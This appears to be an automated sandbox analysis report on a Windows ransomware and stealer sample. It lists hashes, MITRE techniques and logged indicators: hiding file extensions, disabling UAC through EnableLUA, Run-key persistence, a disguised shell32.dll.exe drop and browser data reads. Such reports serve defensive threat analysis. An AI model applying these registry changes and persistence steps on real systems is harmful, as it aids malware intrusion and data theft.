b161c762c5894d820cc10d9027f2404a6fec3bc9f8fd84d23ff1daef98493115

Analysis

max time kernel
451s
max time network
452s
platform
windows11-21h2_x64
resource
win11-20240709-en
resource tags

arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system
submitted
15/07/2024, 10:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

[email protected]
Size

194KB
MD5

8803d517ac24b157431d8a462302b400
SHA1

b56afcad22e8cda4d0e2a98808b8e8c5a1059d4e
SHA256

418395efd269bc6534e02c92cb2c568631ada6e54bc55ade4e4a5986605ff786
SHA512

38fdfe0bc873e546b05a8680335526eec61ccc8cf3f37c60eee0bc83ec54570077f1dc1da26142488930eabcc21cb7a33c1b545a194cbfb4c87e430c4b2bfb50
SSDEEP

3072:slkfrcHVaq65Oe/ALwm19MYDzMLGquSOt+nSmgevSvoWAnvN0bfINcfln8rvK:Wkfrc0q47/UwQFSFnH9SArvakSflnCS

Score

10^/10

evasion persistence ransomware spyware stealer trojan

Malware Config

Signatures

Modifies visibility of file extensions in Explorer 2 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe

UAC bypass 3 TTPs 64 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Renames multiple (77) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Executes dropped EXE 4 IoCs

pid	Process
4108	IuoMEsUc.exe
3504	QEgoQUMY.exe
1748	Process not Found
4068	Process not Found

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\QEgoQUMY.exe = "C:\\ProgramData\\FaYccgsU\\QEgoQUMY.exe"	[email protected]
Set value (str)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Run\IuoMEsUc.exe = "C:\\Users\\Admin\\AQwAIkAA\\IuoMEsUc.exe"	IuoMEsUc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\QEgoQUMY.exe = "C:\\ProgramData\\FaYccgsU\\QEgoQUMY.exe"	QEgoQUMY.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Run\IuoMEsUc.exe = "C:\\Users\\Admin\\AQwAIkAA\\IuoMEsUc.exe"	Process not Found
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\QEgoQUMY.exe = "C:\\ProgramData\\FaYccgsU\\QEgoQUMY.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Microsoft\Windows\CurrentVersion\Run\IuoMEsUc.exe = "C:\\Users\\Admin\\AQwAIkAA\\IuoMEsUc.exe"	[email protected]

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\shell32.dll.exe	IuoMEsUc.exe
File opened for modification	C:\Windows\SysWOW64\shell32.dll.exe	IuoMEsUc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	Process not Found
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	Process not Found

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

pid	Process
3008	Process not Found
2740	Process not Found

Kills process with taskkill 4 IoCs

evasion

pid	Process
1012	Process not Found
424	Process not Found
1900	Process not Found
1544	Process not Found

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\NodeSlot = "7"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\SniffedFolderType = "Generic"	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 14002e80922b16d365937a46956b92703aca08af0000	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\MRUListEx = ffffffff	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "6"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "4294967295"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 0100000000000000ffffffff	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\1\MRUListEx = ffffffff	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell	Process not Found
